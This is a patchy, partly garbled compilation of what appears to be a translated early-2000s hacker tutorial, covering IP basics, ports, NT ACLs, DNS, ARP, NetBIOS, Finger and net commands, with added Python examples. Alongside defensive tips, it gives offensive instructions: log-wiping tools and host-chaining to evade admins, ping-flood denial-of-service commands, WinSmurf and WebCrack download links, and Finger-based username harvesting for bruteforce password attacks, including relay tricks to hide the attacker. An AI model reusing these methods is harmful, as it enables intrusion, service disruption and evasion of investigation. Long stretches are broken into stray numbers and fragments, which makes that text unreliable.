Contents
11. Webcrack
12. MungaBunga
13. WinSmurf
14. Evil Ping
18. DNS
25. IIS
26. UniCode
30. God Will
31. NOOP4
38. CgiScaner
40. Shadow Scan Security
46. .htaccess
47. FTP
48. FTP
49. SQL
50. SQL
55. PHP Shell
Cross Site Scripting (XSS)
The abbreviation is XSS (it is sometimes written CSS, which clashes with Cascading Style Sheets). To find published XSS bugs and exploits, search for:
XSS+BUG+EXPLOIT
and for IIS flaws:
IIS+exploit+bug
Search engines: http://www.google.com/ http://www.yahoo.com/ http://www.altavista.com/ http://www.lycos.com/ http://hotbot.lycos.com/
File sharing: kazaa - WinMX
News: http://news.bbc.co.uk/hi/arabic/news http://arabic.cnn.com/ http://www.aljazeera.net/
Security sites: http://www.securiteam.com/ http://www.securityfocus.com/ http://www.ussrback.com/ http://www.ntbugtraq.com/ http://www.ntsecurity.nu/ http://www.ntsecurity.com/
Drivers and hardware: http://nvidia.com/ http://www.asus.com/ http://drivers.on-line.net.nz/ http://intel.com/ http://www.amdmb.com/
Your IP address
Start, Run, winipcfg shows the address your ISP assigned to you, for example 212.33.40.1 or 24.5.66.3. An IP address is four numbers from 0 to 255 (10.10.10.1); the leading numbers identify the network and the rest identify the host on it. Address blocks are handed out by IANA (Internet Assigned Numbers Authority) through three regional registries:
1. ARIN (American Registry for Internet Numbers)
2. RIPE (Réseaux IP Européens)
3. APNIC (Asia Pacific Network Information Center)
Each registry runs a whois database that maps an address back to the organisation it was allocated to, e.g. http://www.ripe.net/db/whois.html. Two addresses that share their leading numbers, such as 212.26.75.34 and 212.26.75.201, belong to the same network, and a whois search for 212.26.75 returns the owner of that block.
Ports
A host offers each service on a numbered Port: a web server listens on 80, an ftp server on 21, NetMeeting on 1720. DNS (Domain Name System) maps the name you type to the address the machine actually uses, e.g. www.cnn.com to 207.145.53.10.
When you type www.cnn.com the browser asks a DNS server for the IP address and then connects to it. The netstat command (run from the ms-dos prompt under programs) lists your current connections: each connection has a Client side and a server side, and each side is identified by an IP address and a port.
IRC (Internet Relay Chat): a chat client connects to a chat server, and the other users' clients are connected to the same server.
On IRC your IP address is visible to the other users on the chat server (shown partly masked, as in 111.222.XXX.333), so anyone you talk to can learn it. The owner of a domain can be looked up with whois, e.g. www.networksolutions.com/cgi-bin/whois/whois for a domain such as wagait.com (the www part is the host name, not part of the domain).
Port          Service
21            FTP
25            SMTP
80            Web (HTTP)
110           POP3
139           NetBIOS
1503, 1720    NetMeeting
6667          Chat (IRC)
12345, 20034  NetBus (trojan)
31337         BackOrifice (trojan)
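The table above is what a practitioner checks a machine's open ports against. The following Python example, added here and not part of the original page, parses a Windows `netstat -an` listing and flags sockets listening on the trojan ports from the table. The netstat output is constructed for the example; the addresses in it are made up.

```python
"""Flag listening sockets on the backdoor ports from the table above.
Added example; SAMPLE_NETSTAT is constructed, not a real capture."""

# Service table from the page; the trojan entries are the ones to alert on.
KNOWN_PORTS = {
    21: "FTP", 25: "SMTP", 80: "Web", 110: "POP3", 139: "NetBIOS",
    1503: "NetMeeting", 1720: "NetMeeting", 6667: "IRC chat",
}
BACKDOOR_PORTS = {31337: "BackOrifice", 12345: "NetBus", 20034: "NetBus"}

# Constructed to look like `netstat -an` on Windows (hosts are made up).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.0.2.10:1044        198.51.100.7:6667      ESTABLISHED
  UDP    0.0.0.0:31337          *:*
"""


def parse_netstat(text):
    """Return (proto, local_ip, local_port, foreign, state) per socket line."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue                      # headers and blank lines
        proto, local, foreign = parts[0], parts[1], parts[2]
        state = parts[3] if len(parts) > 3 else ""   # UDP has no state column
        ip, _, port = local.rpartition(":")
        rows.append((proto, ip, int(port), foreign, state))
    return rows


def find_backdoors(text):
    """Sockets waiting for connections on a known trojan port -> (proto, port, name)."""
    hits = []
    for proto, _ip, port, foreign, state in parse_netstat(text):
        listening = state == "LISTENING" or (proto == "UDP" and foreign == "*:*")
        if listening and port in BACKDOOR_PORTS:
            hits.append((proto, port, BACKDOOR_PORTS[port]))
    return hits


def describe_port(port):
    """Name a port from the table, trojan names taking precedence."""
    return BACKDOOR_PORTS.get(port) or KNOWN_PORTS.get(port) or "unknown"


if __name__ == "__main__":
    for proto, port, name in find_backdoors(SAMPLE_NETSTAT):
        print("possible trojan: %s port %d (%s)" % (proto, port, name))
```

A port number alone is only a hint: a legitimate service can sit on 12345 and a backdoor can be moved anywhere, so the hit list is where to start looking, not a verdict.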
How you get attacked
1. Viruses.
2. Trojans: a program hidden inside another that opens your machine to whoever sent it.
3. ...
4. Password files: Windows 95 and 98 keep saved passwords in .PWL files; they are encrypted, but weakly, and can be copied and cracked.
5. ICQ: the messenger reveals your IP address to the people you talk to.
6. Scripts: a script received by mail or in a web page runs on your machine.
7. FTP and SMTP: file and mail services that run on your machine can be reached from outside.
Getting in, and the logs
By JawaDal and z3r0.

Here we go. You work from a shell account or from the dos prompt. Start with FTP: type ftp://hostname, or check port 21 with the GFI LANguard network security scanner. Once logged in to ftp, the useful commands are cd, lcd, dir and ls.

Logs (LOG FILES). Every login is written to log files: who logged in, when, from which IP Address or host name, and on web servers also screen resolution and ISP. The three files that matter on Unix are:
- WTMP: every login and logout, with tty and host
- UTMP: who is online now
- LASTLOG: the last login of each user
These are what let the admin track you down, so never log in directly. Go through a chain: connect to one host, from it (by FTP or telnet) to the next, and so on, so the target only sees the last hop. A Wingate proxy in between hides your IP. For browsing use an anonymous web proxy, run a firewall (zone alarm), remove spyware, and clear your own traces with windows washer.

Log modifiers (tools that edit or erase entries in WTMP/UTMP/LASTLOG):
ah-1_0b.tar clear.c cloak2.c invisible.c marryv11.c wzap.c wtmped.c zap.c

How to Stay anonymous: everything above, every time.
Windows NT security

Protection works at several levels: physical access to the machine, the boot path (ROM Boot Chip, RAM), the network, and the operating system's own checks: Permissions on objects and Rights granted to accounts. NT's security rating comes from the National Security Agency (NSA).

Accounts are kept in the Security Accounts Manager (SAM): a Workstation keeps its own SAM, a Domain keeps one on the domain controller. When a user logs on, the system builds an Access Token that holds:
1. the user's Security Identifier (SID)
2. the Group SIDs of every group the user belongs to
3. the user's Privileges
The same token is built for a Remote Logon, and every process the user starts carries it.

Every object has an Access Control List (ACL) made of Access Control Entries (ACE). Each ACE names one SID and is one of:
1. AccessAllowed
2. AccessDenied (No Access)
To decide a request, the system compares the SIDs in the token with the ACEs in the ACL. NT and 2000 place AccessDenied ACEs before AccessAllowed ACEs, so a deny that matches any SID in the token is found first and wins over a later allow for the same SID or one of its groups. An object with no matching ACE grants nothing.
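The evaluation order matters more than it looks: the same ACEs in a different order give a different answer. The Python example below, added here and not taken from the page, models the token and ACL described above and shows a deny ACE that is honoured only when the ACL is in NT's canonical order. The SIDs and the rights bit values are made-up placeholders.

```python
"""Windows-style ACL evaluation as described above. Added example; the
SIDs and the READ/WRITE/EXECUTE bit values are placeholders, not real
Windows access masks."""

READ, WRITE, EXECUTE = 0x1, 0x2, 0x4


class ACE:
    def __init__(self, sid, rights, allow):
        self.sid, self.rights, self.allow = sid, rights, allow


class Token:
    """Access token: the user's SID plus the SIDs of the user's groups."""
    def __init__(self, user_sid, group_sids):
        self.sids = {user_sid, *group_sids}


def canonical(acl):
    """NT/2000 order: all AccessDenied ACEs before all AccessAllowed ACEs."""
    return [a for a in acl if not a.allow] + [a for a in acl if a.allow]


def check_access(token, acl, wanted):
    """Walk the ACL in order. Grant only when every wanted bit has been
    allowed before any applicable ACE denies one of them. No ACEs = No Access."""
    granted = 0
    for ace in acl:
        if ace.sid not in token.sids:
            continue                      # ACE does not apply to this token
        if not ace.allow:
            if ace.rights & wanted:
                return False              # an applicable deny ends the walk
            continue
        granted |= ace.rights & wanted
        if granted == wanted:
            return True
    return False


def demo():
    everyone, users, admins = "S-1-1-0", "S-1-5-32-545", "S-1-5-32-544"
    ex_employee = "S-1-5-21-1-1-1001"
    # Badly ordered ACL: the allow for Everyone precedes the deny for ex_employee.
    acl = [ACE(everyone, READ, True),
           ACE(ex_employee, READ | WRITE, False),
           ACE(admins, READ | WRITE | EXECUTE, True)]
    ordered = canonical(acl)
    ex_token = Token(ex_employee, [everyone, users])
    admin_token = Token("S-1-5-21-1-1-500", [everyone, admins])
    user_token = Token("S-1-5-21-1-1-1002", [everyone, users])
    return {
        "ex_read_unordered": check_access(ex_token, acl, READ),      # allow hit first
        "ex_read_canonical": check_access(ex_token, ordered, READ),  # deny hit first
        "admin_write": check_access(admin_token, ordered, WRITE),
        "user_write": check_access(user_token, ordered, WRITE),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

The ex-employee reads the object through his Everyone membership when the allow comes first, and is refused when the deny is moved in front of it; that is exactly why the order is fixed by the system rather than left to whoever wrote the ACL.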
61
"
"
><
><BeReal :
.
62
. .
=============================
=============================
===========
) -:(Telnet
.
.
.
.
.
63
)(21
Anonymous Mode
.
. Start ==> Run
==> telnet .
-----------------------------------------------------------------------
-:Scanner
)(Exploits
. .
64
Shadow Security
Scanner Stealth Omran Fast
Scanner .
.
.
IIS
CGI .
----------------------------------------------------------------------
) -:(Exploits
.
URL.
.
.
.
65
. Buffer Over Flow Exploits
CGI
Exploits CGI Bugs
Unicodes Exploits Buffer
Over Flow Exploits
PHP Exploits DOS
Exploits .
.
. Fire Wall
). (c.
.
66
.
.
. )
(
Borland C++ Compiler
. .
---------------------------------------------------------------------
-:FireWall
. .
) (
. .
67
---------------------------------------------------------------------
-:Token )
(Shadowed Passwd
* x . Shadowed
. Shadow file
. etc/shadow/
---------------------------------------------------------------------
-:Anonymouse
.
68
.
---------------------------------------------------------------------
-:Valnerableties
.
Valnerable (:
.
Security Focus .
69
---------------------------------------------------------------------
: passwd file
.
.
-------------------------------------------------------------------- : root .
.
.
.
.
70
-------------------------------------------------------------------- :Server
24
24 . (:
.
71
- .
. -
--------------------------------------------------------------------- ) : ( Buffer over Flow
.
.
-
-
.
- DOS -
.
.
72
" "
:::
.
.
.
.
.
.
73
74
75
76
77
78
http://www.dunbell.freeserve.
co.uk/webcrack40.zip
79
1
2 BROWSE
.
3 BROWSE
81
)
.....(
4
5 )
(
6
7
8
9
. 10
82
11
6
. 12
13
) (
14
:
http://koti.mbnet.fi/hypnosis/c
aliberx/cracking.htm
83
-------------------------------------------------------------
http://www.planeteagle.de/files/WSmurf.zip
86
200
.
.
Download: http://www.geocities.com/boom_q8y4/dorrah.zip
Evil Ping
First check that the host answers:
Ping www.xx.com
Then send a stream of large packets; -n sets the number of packets and -l their size in bytes:
ping -n 1000 -l 400 www.xxx.com
To keep pinging until you stop it with Ctrl-C:
ping -t ip
where ip is the target's address.
" "
> <
.
2000
63
94
Telnet Authentication
You can use your local Windows
2000 user name and password or
domain account information to
access the Telnet server. The
security scheme is integrated into
Windows 2000 security. If you do
not use the NT LAN Manager
(NTLM) authentication option, the
user name and password are sent
to the Telnet server as plain text.s
2000 security context for
authentication and the user is not
prompted for a user
If you are using NTLM
authentication, the client uses the
Windowname and password. The
user name and password are
.encrypted
NTLM .
95
In a Windows 2000 Server default
installation, the Telnet service is set
96
In the Computer Management snapin, Telnet is a service located under
the Services and Applications node.
Select Services from the console
tree, and then select Telnet from the
.list of services in the details pane
You can also start or stop the Telnet
service from a command prompt. To
97
98
Quit this
application
Terminate a
user session
Telnet
Server Admin
99
Display/change
registry
settings
Start the
service
Stop the
service
Invalid
input
Failed to
open the
100
registry key
Failed to
query the
registry
value
You can use Microsoft Telnet Client
to connect to a remote computer
running the Telnet service or other
Telnet server software. Once you
have made this connection, you can
communicate with the Telnet server.
The type of session you conduct
depends on how the Telnet software
is configured. Communication,
games, system administration, and
local logon simulations are some
.typical uses of Telnet
101
,Run ,Start ,Telnet
. telnet .telnet
.
TCP/IP
103
104
,Programs , Start
.Services Administrative Tools
Services
.Telnet
The Telnet Properties
((Local Computer
Manual Startup Type
.Automatic
. Start ,Service status
Local) OK
Computer) Telnet properties
. Services
Hishem2 Hishem1
.Run , Start
105
telnet .OK
help ?
open Hishem2
. o open
Hishem2
Hishem2
106
Hishme2
Hishem1
, Start .Run
tlntadmn .OK
Telnet Server Admin
1
.
NOR IP
2 .
107
.
1 .
1
Hishem1
108
List
.
109
dele
pop
[open [\\RemoteServer] [Port
\\ RemoteServer
.
.
Port
110
.
.
.o
Redmond
44:
o redmond 44
Telnet
[close [\\RemoteServer
\\ RemoteServer
.
.
111
.c
Redmond:
c redmond 44
Telnet
]send [\\RemoteServer] [ao] [ayt
[?] [[esc] [ip] [synch
\\ RemoteServer
.
.
ao
.
112
ayt
"."?Are you there
esc
.
ip
.
synch
.Telnet
Telnet
display
113
display
.Telnet ) Telnet
(Telnet
Telnet
.[+CTRL Telnet
.ENTER
tlntadmn
Telnet
]tlntadmn [\\RemoteServer] [start
[[stop] [pause] [continue
\\ RemoteServer
.
.
start
114
.Telnet
stop
.Telnet
pause
.Telnet
continue
.Telnet
Telnet
. tlntadmn
.
2000 .2000
. tlntadmn
Windows 2000 Telnet
.
Windows XP
Telnet
115
tlntadmn [\\RemoteServer] config
[[maxconn=PositiveInteger
\\ RemoteServer
.
.
maxconn=PositiveInteger
.
10
.
Telnet
tlntadmn [\\RemoteServer] config
[[maxfail=PositiveInteger
116
\\ RemoteServer
.
.
maxfail=PositiveInteger
. .
.100
Telnet
tlntadmn [\\RemoteServer] config
[[timeout=hh:mm:ss
\\ RemoteServer
117
.
.
timeout=hh:mm:ss
.
. ? /
..
DNS
By Dark Devil.

What is DNS?
DNS stands for Domain Name System. A DNS server listens on port 53 and translates alphabetical hostnames into IP ADDRESSES: when you type http://www.burn.com/ the resolver asks DNS for the address (127.0.0.1 in the example) and the connection is made to that address. This step is called address resolution. Before DNS every machine kept a HOST FILE with all the name-to-address pairs; the master copy was maintained by the Stanford Research Institute's Network Information Center (SRI-NIC), and every site had to fetch each UPDATE from SRI-NIC by FTP. That did not scale, so DNS was designed decentralized: each DNS server knows its own names and where to ask for the rest.

THE DNS SERVER
Most DNS SERVERS run on UNIX with BIND (Berkeley Internet Name Domain). Two parts matter: the name server itself (the daemon program), which answers queries, and the data it serves. Asked for http://www.burn.com/, the daemon returns the IP address from its own data or fetches it from another server.

THE TREE INFORMATION
The name space is a tree. Your ISP, say isp.co.uk, runs a DNS server with hostname dns.isp.co.uk, and your machine sends every query there. If dns.isp.co.uk does not know the address of http://www.burn.com/ it asks the servers above it, up to the ROOT servers, which know where every top-level domain is served; the answer comes back down the chain, and the server responsible for the DOMAIN NAME (some-organization.org.uk, school.edu.uk, university.ac.uk, england.gov.uk, airforce.mil.uk in the UK) supplies the IP address.

When and why does DNS "hang" or fail?
If your ISP's DNS server is down or overloaded, the browser cannot turn the name into an IP address; after about 15 seconds it reports "address could not be found" or that the HOST TIMED OUT, even though the site itself is up. REFRESH or RELOAD sends the query again. A site reached by its IP address still works.
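What actually crosses port 53 during the address resolution described above is one small binary query and one binary answer. The Python example below, added here and not part of the original page, builds the query a resolver sends for an A record and parses the reply, including the name-compression pointer that answers use. No server is contacted: the reply bytes are constructed by hand, and www.burn.com and 127.0.0.1 are the page's own placeholders.

```python
"""DNS A-record query and response parsing. Added example; sample_response()
is a hand-built reply, not captured traffic."""

import struct


def build_query(name, txid=0x1234):
    """Standard query: RD=1, one question, QTYPE=A (1), QCLASS=IN (1)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode()
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)


def read_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, jumped, end = [], False, off
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                    # compression pointer
            ptr = struct.unpack("!H", msg[off:off + 2])[0] & 0x3FFF
            if not jumped:
                end = off + 2                        # resume after the pointer
            off, jumped = ptr, True
            continue
        off += 1
        if length == 0:
            break
        labels.append(msg[off:off + length].decode())
        off += length
    if not jumped:
        end = off
    return ".".join(labels), end


def parse_response(msg, expected_txid):
    """Return [(name, ipv4)] from the answer section, or None if the id does
    not match, the QR bit is clear, or RCODE signals an error."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    if txid != expected_txid or not flags & 0x8000 or flags & 0x000F:
        return None
    off = 12
    for _ in range(qd):                              # skip the echoed question
        _, off = read_name(msg, off)
        off += 4
    answers = []
    for _ in range(an):
        name, off = read_name(msg, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rclass == 1 and rdlen == 4:
            answers.append((name, ".".join(str(b) for b in rdata)))
    return answers


def sample_response(txid=0x1234):
    """Constructed reply: QR=1 RD=1 RA=1, question echoed, one A answer whose
    name is a pointer (0xC00C) back to the question name at offset 12."""
    query = build_query("www.burn.com", txid)
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    answer = b"\xC0\x0C" + struct.pack("!HHIH", 1, 1, 300, 4) + bytes([127, 0, 0, 1])
    return header + query[12:] + answer
```

The transaction-id check is the only thing that ties an answer to the question you asked, which is why a resolver that accepts any id is open to spoofed replies.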
TCP/IP addressing
TCP/IP has to solve three addressing problems:
1. Physical Address Determination
2. Selection of inter-network gateways
3. Symbolic and Numeric Addresses
An ip address is a logical address; to deliver a packet on the local wire the ip layer also needs the physical address of the next hop (the inclusion of a local network address in the frame).

Physical Address Determination
ip data travels inside frames addressed by physical address, so before a host sends it must map the destination ip address to a physical address. The mapping is done by ARP (Address Resolution Protocol): the host asks the local network which interface owns the ip address and keeps the answers in its ARP cache. arp -a lists the cache:

C:\WINDOWS>arp -a

Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic

The Physical Address is the Mac Address of the interface that answered for that ip. For hosts outside your own network it is the router's address, which is why every entry above carries the same hardware address. Type dynamic means the entry was learned from an ARP reply and expires; static entries are entered by hand and never expire (routers keep static entries for their neighbours).
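Because ARP entries are learned from whatever answers, the cache is also where ARP spoofing shows up: one hardware address claiming several IP addresses, or the gateway's address changing. The Python example below, added here and not part of the page, parses an `arp -a` listing and performs both checks. The listing is constructed from the page's output plus one made-up static gateway entry; on the page the shared address is the router, which is why the check reports it rather than decides about it.

```python
"""Parse `arp -a` output and flag a MAC shared by several IPs or a changed
gateway MAC. Added example; SAMPLE_ARP is constructed."""

import re
from collections import defaultdict

SAMPLE_ARP = """\
Interface: 62.135.9.102 on Interface 0x2
  Internet Address      Physical Address      Type
  207.46.226.17         20-53-52-43-00-00     dynamic
  213.131.64.2          20-53-52-43-00-00     dynamic
  213.131.65.238        20-53-52-43-00-00     dynamic
  62.135.9.1            00-50-56-c0-00-08     static
"""

ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"            # IP address
    r"([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\s+"  # MAC, Windows or Unix style
    r"(dynamic|static)\s*$", re.IGNORECASE)


def parse_arp(text):
    """Return [(ip, mac, type)] with MACs normalised to lower-case aa-bb-cc-dd-ee-ff."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower().replace(":", "-"), kind.lower()))
    return entries


def shared_macs(entries):
    """{mac: sorted IPs} for every MAC that answers for more than one IP."""
    by_mac = defaultdict(set)
    for ip, mac, _kind in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_changed(entries, gateway_ip, expected_mac):
    """True if the cached MAC for the gateway differs from the one recorded earlier."""
    for ip, mac, _kind in entries:
        if ip == gateway_ip:
            return mac != expected_mac.lower().replace(":", "-")
    return False


if __name__ == "__main__":
    cache = parse_arp(SAMPLE_ARP)
    for mac, ips in shared_macs(cache).items():
        print("%s answers for %d addresses: %s" % (mac, len(ips), ", ".join(ips)))
```

On a LAN the interesting case is the reverse of the page's listing: a host on your own subnet that suddenly shares the gateway's MAC, or a gateway whose MAC no longer matches the one you recorded when the network was known to be clean.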
SNMP and NetBIOS
NetBIOS is the API Windows uses for file and printer sharing; over TCP/IP it listens on TCP port 139, and on NT a remote user can read machine, share and account names through it. To switch it off on NT: in the TCP/IP properties open Advanced, then the WINS tab, and disable NetBIOS over TCP/IP. Set RestrictAnonymous under Administrative TOOLS, Local Security policy, Local policies, security options, so that anonymous users cannot enumerate the machine.

NetBIOS enumeration tools: Net View (lists the machines and shares visible from an NT/W2000 host, given an IP address), the other Net commands, Nbtscan and Legion (scan a range for shares). They use TCP and UDP ports 135, 139 and 445.

SNMP on Windows 2000 ships with the community name Public. Remove public, and turn on Send authentication trap so failed community names are reported. To stop the LAN Manager MIB from handing out account and share information, open regedit and delete LANManagerMIB2Agent from
HKEY_LOCAL_MACHINE\system\currentControlset\services\SNMP\parameters\ExtensionAgent
Finally set RestrictAnonymous = 2, which refuses anonymous access to TCP/IP NetBIOS information altogether.
Finger
By LAMeR.

The Finger service listens on port 79.
1.1 Introduction
1.2 What Finger is
1.3 Using Finger
1.4 Attacking with Finger
1.5 Bouncing Finger through another host
1.6 Defending against Finger
1.7 Closing

1.1 Introduction
This text covers what the Finger daemon gives away, how it is used against a host, and how to stop it.

1.2 What Finger is
Finger is a service on port 79 that returns a kind of businesscard for a remote user: who is logged in, their real name, terminal, idle time and where they came from. It was meant for users and the admin to find each other, but everything it returns is what an attacker wants before a break-in: valid account names to try passwords against, and who is idle or away. portscans show port 79 open on thousands of hosts; a host that runs the Finger Daemon is saying "Finger me!". The daemon answers anyone who asks, and the server keeps no record of the client unless the admin adds it.

1.3 Using Finger
Find a host with port 79 open (a port scanner such as superscan will do). If http://www.foobar.com/ has Port 79 open, the Finger daemon is there and you need a client to send it a request. Windows has no finger client installed, so use Telnet:

Telnet (client) -------- request --------> Finger Daemon (in Server)

From the MS-DOS prompt:
telnet www.foobar.com 79
then press ENTER on an empty line and the daemon lists the logged-in users. On a unix shell the finger client does the work: what comes before "@" is the user (nothing = everybody), what comes after is the host, and the "www" is not needed:
finger @anyname.com
finger @www.anyname.com
For http://www.foobar.com/ the result looks like:

Login   Name          Tty      Idle  When       Where
root    foobar sys    console  17d   Tue 10:13  node0ls3.foobar.com
<.......> <.......> <.......>
Amos Amanda
Anderson Kenneth
Bright Adrian
Doe John
<.......> <.......> <.......>
Johnson Peter
Mitnick Kevin
Munson Greg
Orwell Dennis

Login is the account name, Name the real name, Tty the terminal type, Idle the idle time, When the login time and Where the host the user came from. To ask about one user, e.g. Johnson Peter:
finger johnson@foobar.com

1.4 Attacking with Finger
Finger hands you the login names, which is 50% of what you need for Access. Feed them to a bruteforce password cracker with a wordlist, for instance VLAD's pwscan.pl from http://www.thehackerschoice.com/: every name is tried against every word. Admin and root accounts are the prize. Many daemons also search:
finger secret@foobar.com
returns every account whose login or name contains "secret"; try "test", "temp", "0000" and the like. Two requests that list all users on many daemons, although the RFC does not ask for it:
finger .@foobar.com
finger 0@foobar.com

1.5 Bouncing Finger through another host
Finger requests can be forwarded from one daemon to another, so you can query www.victim.com through www.host.com:
finger @host.com@victim.com
The daemon you connect to forwards the query onward, so the host that finally answers logs the relaying daemon's address, not yours. Chain several hosts and the trail gets longer. Not every daemon forwards; many refuse, but enough still do.

1.6 Defending against Finger
Do not run the Finger Daemon unless you need it. If you do, restrict access to it, and remember that it is the first step of a wordlist/bruteforce attack on your accounts: a Finger daemon that answers everyone is an invitation.

1.7 Closing
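The requests above are one line of text each, so they are easy to build and the replies are easy to parse. The Python example below, added here and not part of the original text, constructs the request forms used in this section (the empty listing, a single user, and the forwarded user@host form) and parses a daemon's listing into records. SAMPLE_REPLY is constructed after the foobar.com listing; finger() opens a real connection and is only used if you call it.

```python
"""Finger (port 79) requests and listing parser. Added example; the
SAMPLE_REPLY text and its hosts are made up."""

import socket


def finger_request(query=""):
    """RFC 1288 request line: '' lists everyone logged in, 'user' asks about
    one account, 'user@host' asks the daemon to forward the query to host.
    Embedded line breaks are refused so one call is exactly one request."""
    if "\r" in query or "\n" in query:
        raise ValueError("query must be a single line")
    return (query + "\r\n").encode("ascii")


def relay_request(user, target):
    """Request to send to an intermediate finger daemon so that *it* queries
    target: the intermediate opens the connection to target, whose daemon
    therefore logs the intermediate's address. From a shell this is
    `finger user@target@intermediate`."""
    return finger_request("%s@%s" % (user, target))


def finger(host, query="", port=79, timeout=5.0):
    """Send one request and return the daemon's reply (network call)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(finger_request(query))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                return b"".join(chunks).decode("latin-1")
            chunks.append(data)


# Constructed in the layout the page shows; names and hosts are made up.
SAMPLE_REPLY = """\
Login    Name            Tty      Idle  When       Where
root     foobar sys      console  17d   Tue 10:13  node0ls3.foobar.com
johnson  Johnson Peter   pts/1    2     Tue 11:40  dialup-9.isp.co.uk
"""


def parse_listing(text):
    """Parse a 'Login Name Tty Idle When Where' listing into dicts. Name may
    contain spaces and When is two words, so the fixed columns are taken
    from the right-hand end of each line."""
    users = []
    for line in [l for l in text.splitlines() if l.strip()][1:]:
        parts = line.split()
        if len(parts) < 7:
            continue                              # not a listing row
        users.append({"login": parts[0],
                      "name": " ".join(parts[1:-5]),
                      "tty": parts[-5], "idle": parts[-4],
                      "when": " ".join(parts[-3:-1]),
                      "where": parts[-1]})
    return users


def logins_to_try(listing):
    """The Login column: what a wordlist attack against the host starts from."""
    return [u["login"] for u in parse_listing(listing)]
```

The relay form is the reason the defending side should both disable forwarding and log the peer address: with forwarding on, the address in your log is the last daemon in the chain, not the client.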
154
"
" NET
> <
.
.net
net
155
:
net
? net /
.
net
net help command
.
net acc
ounts :
net help accounts
net
) /y( ) /n( .
net stop serv
er
net stop
server /y
.
.
).("Service Name "
156
:net logon
"net start "net logon
Net
Net accounts
.
net accounts
| [/forcelogoff:{minutes
]no}] [/minpwlen:length
| [/maxpwage:{days
]}unlimited
][/minpwage:days
][/uniquepw:number
][/domain
}/forcelogoff:{minutes | no
157
.
.
.
no
.
/minpwlen:length
..
0 127
.
| /maxpwage:{days
}unlimited
.
. .
unlimited
.
/maxp
wage /minpwag
.e 1
49,710 )
158
unlimited 49,710
( 90
.
/minpwage:days
.
.
.
0
.
0 49,710
.
/uniquepw:number
.
number
.
0 24
.
/domain
159
.
,
.
net help command
net
.
Net
Logon
. .
net
accounts
.
. :net accounts
o .
.
net user
.
o Net Logon
160
. Net
Logon
.
. /forcelogoff:
minutes
. .
.
minutes
.
:
net accounts
:
161
Net computer
.
net
\ computer
| \ComputerName {/add
}/del
\\ComputerName
.
}{/add | /del
.
net help command
net
.
Net computer
163
Grizzlybear
:
net computer \\grizzlybear
/add
Net config
.
net
config
.
|net config [{server
]}workstation
server
164
.
workstation
.
?/
.
(
) Server is active on
(
) Server hidden /hi
(dden
Maximum logged on
) users
.
(
Maximum open files per
) session
(
) Idle session time(
. net config
workstation
.
Net config
workstation :
Computer name
Full computer name
User name
166
)Workstation active on
(
)Software version
(
Workstation domain
Workstation domain DNS
name
Logon domain
( )COM open timeout
( )COM send count
)COM send timeout
(
Net continue
.net pause
net continue service
service
.
167
.
.service
Net
netlogon
.Logon
NT
"nt lm
LM Security security
Support
support
.Provider "provider
schedule
..
server
.
workstatio
.
n
net help command
net
.
.
168
. net continue
..
.
.
) "
.("Service Name
:
net continue workstation
.
NT LM
Security Support Provider
Service:
net continue "nt lm
security support
169
"provider
Net file
.
. .
net file
.
]]net file [ID [/close
ID
.
/close
.
.
170
net files
.
. net file
. .
.
.. net file /close
.
net file :
File
Path
Username #locks
-----------------------------------------0
C:\A_FILE.TXT
MARYSL
0
171
C:\DATABASE
DEBBIET 2
:
net file
1
:
net file 1 /close
Net group
.
net group [groupname
[/comment:"text"]]
[/domain]
net group [groupname
{/add [/comment:"text"]
| /delete} [/domain]]
172
groupname
.
.
"/comment:"text
.
48 .
.
/domain
.,
.
/add
173
. .
.
.
/delete
. .
]UserName[ ...
.
.
net help command
net
.
net group
.
. .net groups
174
net group
.
. .
net group
)*(.
net group
:
Group Accounts for
\\PRODUCTION
--------------------------------------------*Domain Admins
*Domain Users
:
net group
nor
175
:
net group NOR /add
nor
:
net group NOR /add
/domain
stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add
stevev ralphr jennyt
nor
:
net group NOR stevev
ralphr jennyt /add /domain
nor:
net group NOR
176
Net help
.
. net
help
.
]net help [command
command
/help
.
.
net
177
use:
net help use
:
net use /help
net help
:
?net help /
Net helpmsg
.
net helpmsg message#
message#
.
.
net help command
net
.
178
:
2182: The requested service has already been
started.
. NET
2182:
net helpmsg 2182
Net localgroup
. .
net
localgroup
.
net localgroup
[GroupName
]]"[/comment:"text
179
Remote connections: r-commands and secure shell

The BSD r-commands (rlogin, rsh and rcp) let a remote connection in on the strength of the client's host name and address alone, so anyone who can fake a trusted host gets unauthorized access to systems, up to root access. secure shell (ssh) replaces them: it runs over tcp, authenticates the host and the user, and encrypts the whole session, so what you get is authorized access to systems and nothing readable on the wire.

What ssh protects against:
1. ip spoofing, including an attacker on the local network pretending to be a host you trust (the ssh host key is checked locally)
2. DNS spoofing
3. ...
4. ...
